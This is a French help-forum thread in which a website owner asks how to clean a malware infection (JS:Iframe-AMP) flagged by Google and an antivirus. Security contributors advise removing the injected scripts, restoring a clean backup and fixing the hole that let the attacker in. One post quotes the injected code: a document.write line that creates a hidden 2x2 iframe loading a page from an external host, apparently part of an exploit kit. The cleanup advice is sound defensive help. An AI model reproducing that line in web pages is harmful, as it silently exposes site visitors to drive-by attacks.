Supprimer JS:Iframe-AMP [Trj]

Fermé
Trinity29 - 5 juin 2013 à 20:31
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 5 juin 2013 à 23:24
Bonsoir
Depuis plusieurs jours, mon site web Garodevoirs est blacklisté par Google, pour cause de malware.
J'ai analysé le contenu de mon ftp et mon antivirus y a trouvé la menace JS:Iframe-AMP [Trj].
Malheureusement il ne peut réparer les fichiers infectés. Et ce sont des fichiers .php importants de mon site, donc je ne peux pas les supprimer...
Pourriez-vous m'aider à me débarrasser de cela svp?
Je vous remercie.
A voir également:

3 réponses

juju666 Messages postés 35446 Date d'inscription jeudi 18 décembre 2008 Statut Contributeur sécurité Dernière intervention 21 avril 2024 4 796
Modifié par juju666 le 5/06/2013 à 20:43
Salut

Go ouvrir notepad++ et supprimer les <script> néfastes.

Entre nous :

- Tes régies pub elles ont l'air craignos
- Vous avez une sale réputation sur WOT
- Mozilla Foundation bloque ton site
- et Google également, comme tu le cite ...

A+

.::. Contributeur Sécurité .::.
1
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 656
5 juin 2013 à 20:43
Salut,

Faut que tu nettoyes le code qui génère le script malicieux ou que tu repartes d'une sauvegarde antérieure qui n'a pas été infectée.
Voir exemple là : https://www.malekal.com/virus-securite/

Ensuite faut sécuriser ton code car tu dois avor une vulnérabilité qui a permis le hack, peut-être une sql injection.
0
Merci pour vos réponses.
Je suis en train de supprimer les codes suspects, mais dans de nombreux .js il y a cela au tout début du fichier: document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://telnetz.de/cewf.html?j=3349784></iframe>');
Pouvez-vous me dire quelle partie garder exactement svp? Je vais devoir le faire dans des dizaines de fichiers donc je n'aimerais pas me montrer d'un ' ou quoi ;).
Merci.
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 656
5 juin 2013 à 23:14
faut tout vrier là.
On dirait du redkit.
0
C'est quoi du redkit?
Et il faut vraiment tout enlever?
Je veux dire, il n'y a même pas à garder le début, document.write ni les parenthèses ni rien?
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 656
5 juin 2013 à 23:24
non vire tout.
0